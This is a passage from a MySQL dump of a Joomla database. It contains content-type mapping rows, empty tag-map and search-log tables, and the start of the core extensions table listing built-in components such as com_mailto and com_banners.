\"ordering\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(4,'User','com_users.user','{\"special\":{\"dbtable\":\"#__users\",\"key\":\"id\",\"type\":\"User\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"null\",\"core_alias\":\"username\",\"core_created_time\":\"registerdate\",\"core_modified_time\":\"lastvisitDate\",\"core_body\":\"null\", \"core_hits\":\"null\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"access\":\"null\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"null\", \"core_language\":\"null\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"null\", \"core_ordering\":\"null\", \"core_metakey\":\"null\", \"core_metadesc\":\"null\", \"core_catid\":\"null\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\": {}}','UsersHelperRoute::getUserRoute',''),(5,'Article Category','com_content.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','ContentHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(6,'Contact Category','com_contact.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','ContactHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(7,'Newsfeeds Category','com_newsfeeds.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','NewsfeedsHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(8,'Tag','com_tags.tag','{\"special\":{\"dbtable\":\"#__tags\",\"key\":\"tag_id\",\"type\":\"Tag\",\"prefix\":\"TagsTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"null\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\"}}','TagsHelperRoute::getTagRoute','{\"formFile\":\"administrator\\/components\\/com_tags\\/models\\/forms\\/tag.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\", \"lft\", \"rgt\", \"level\", \"path\", \"urls\", \"publish_up\", \"publish_down\"],\"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(10000,'Banner','com_banners.banner','{\"special\":{\"dbtable\":\"#__banners\",\"key\":\"id\",\"type\":\"Banner\",\"prefix\":\"BannersTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"null\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"link\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\":{\"imptotal\":\"imptotal\", \"impmade\":\"impmade\", \"clicks\":\"clicks\", \"clickurl\":\"clickurl\", \"custombannercode\":\"custombannercode\", \"cid\":\"cid\", \"purchase_type\":\"purchase_type\", \"track_impressions\":\"track_impressions\", \"track_clicks\":\"track_clicks\"}}','','{\"formFile\":\"administrator\\/components\\/com_banners\\/models\\/forms\\/banner.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\", \"reset\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"imptotal\", \"impmade\", \"reset\"], \"convertToInt\":[\"publish_up\", \"publish_down\", \"ordering\"], \"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"cid\",\"targetTable\":\"#__banner_clients\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(10001,'Banners Category','com_banners.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"], \"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(10002,'Banner Client','com_banners.client','{\"special\":{\"dbtable\":\"#__banner_clients\",\"key\":\"id\",\"type\":\"Client\",\"prefix\":\"BannersTable\"}}','','','','{\"formFile\":\"administrator\\/components\\/com_banners\\/models\\/forms\\/client.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\"], \"ignoreChanges\":[\"checked_out\", \"checked_out_time\"], \"convertToInt\":[], \"displayLookup\":[]}'),(10003,'User Notes','com_users.note','{\"special\":{\"dbtable\":\"#__user_notes\",\"key\":\"id\",\"type\":\"Note\",\"prefix\":\"UsersTable\"}}','','','','{\"formFile\":\"administrator\\/components\\/com_users\\/models\\/forms\\/note.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\", \"publish_up\", \"publish_down\"],\"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\"], \"convertToInt\":[\"publish_up\", \"publish_down\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(10004,'User Notes Category','com_users.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"], \"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(10005,'Weblink','com_weblinks.weblink','{\"special\":{\"dbtable\":\"#__weblinks\",\"key\":\"id\",\"type\":\"Weblink\",\"prefix\":\"WeblinksTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"state\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"url\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\":{}}','WeblinksHelperRoute::getWeblinkRoute','{\"formFile\":\"administrator\\/components\\/com_weblinks\\/models\\/forms\\/weblink.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"featured\",\"images\"], \"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"ordering\"], \"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"], \"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(10006,'Weblinks Category','com_weblinks.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','WeblinksHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}');
/*!40000 ALTER TABLE `j25_content_types` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_contentitem_tag_map`
--

DROP TABLE IF EXISTS `j25_contentitem_tag_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_contentitem_tag_map` (
  `type_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `core_content_id` int(10) unsigned NOT NULL COMMENT 'PK from the core content table',
  `content_item_id` int(11) NOT NULL COMMENT 'PK from the content type table',
  `tag_id` int(10) unsigned NOT NULL COMMENT 'PK from the tag table',
  `tag_date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'Date of most recent save for this tag-item',
  `type_id` mediumint(8) NOT NULL COMMENT 'PK from the content_type table',
  UNIQUE KEY `uc_ItemnameTagid` (`type_id`,`content_item_id`,`tag_id`),
  KEY `idx_tag_type` (`tag_id`,`type_id`),
  KEY `idx_date_id` (`tag_date`,`tag_id`),
  KEY `idx_core_content_id` (`core_content_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Maps items from content tables to tags';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_contentitem_tag_map`
--

LOCK TABLES `j25_contentitem_tag_map` WRITE;
/*!40000 ALTER TABLE `j25_contentitem_tag_map` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_contentitem_tag_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_core_log_searches`
--

DROP TABLE IF EXISTS `j25_core_log_searches`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_core_log_searches` (
  `search_term` varchar(128) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `hits` int(10) unsigned NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_core_log_searches`
--

LOCK TABLES `j25_core_log_searches` WRITE;
/*!40000 ALTER TABLE `j25_core_log_searches` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_core_log_searches` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_extensions`
--

DROP TABLE IF EXISTS `j25_extensions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_extensions` (
  `extension_id` int(11) NOT NULL AUTO_INCREMENT,
  `package_id` int(11) NOT NULL DEFAULT '0' COMMENT 'Parent package ID for extensions installed as a package.',
  `name` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
  `type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `element` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
  `folder` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
  `client_id` tinyint(3) NOT NULL,
  `enabled` tinyint(3) NOT NULL DEFAULT '0',
  `access` int(10) unsigned NOT NULL DEFAULT '1',
  `protected` tinyint(3) NOT NULL DEFAULT '0',
  `manifest_cache` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `custom_data` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `system_data` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) DEFAULT '0',
  `state` int(11) DEFAULT '0',
  PRIMARY KEY (`extension_id`),
  KEY `element_clientid` (`element`,`client_id`),
  KEY `element_folder_clientid` (`element`,`folder`,`client_id`),
  KEY `extension` (`type`,`element`,`folder`,`client_id`)
) ENGINE=InnoDB AUTO_INCREMENT=10098 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_extensions`
--

LOCK TABLES `j25_extensions` WRITE;
/*!40000 ALTER TABLE `j25_extensions` DISABLE KEYS */;
INSERT INTO `j25_extensions` VALUES (1,0,'com_mailto','component','com_mailto','',0,1,1,1,'{\"name\":\"com_mailto\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MAILTO_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mailto\"}','','','',0,'0000-00-00 00:00:00',0,0),(2,0,'com_wrapper','component','com_wrapper','',0,1,1,1,'{\"name\":\"com_wrapper\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2007 Open Source Matters, Inc.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_WRAPPER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"wrapper\"}','','','',0,'0000-00-00 00:00:00',0,0),(3,0,'com_admin','component','com_admin','',1,1,1,1,'{\"name\":\"com_admin\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_ADMIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(4,0,'com_banners','component','com_banners','',1,1,1,0,'{\"name\":\"com_banners\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_BANNERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"banners\"}','{\"purchase_type\":\"3\",\"track_impressions\":\"0\",\"track_clicks\":\"0\",\"metakey_prefix\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(5,0,'com_cache','component','com_cache','',1,1,1,1,'{\"name\":\"com_cache\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CACHE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(6,0,'com_categories','component','com_categories','',1,1,1,1,'{\"name\":\"com_categories\",\"type\":\"component\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2007 Open Source Matters, 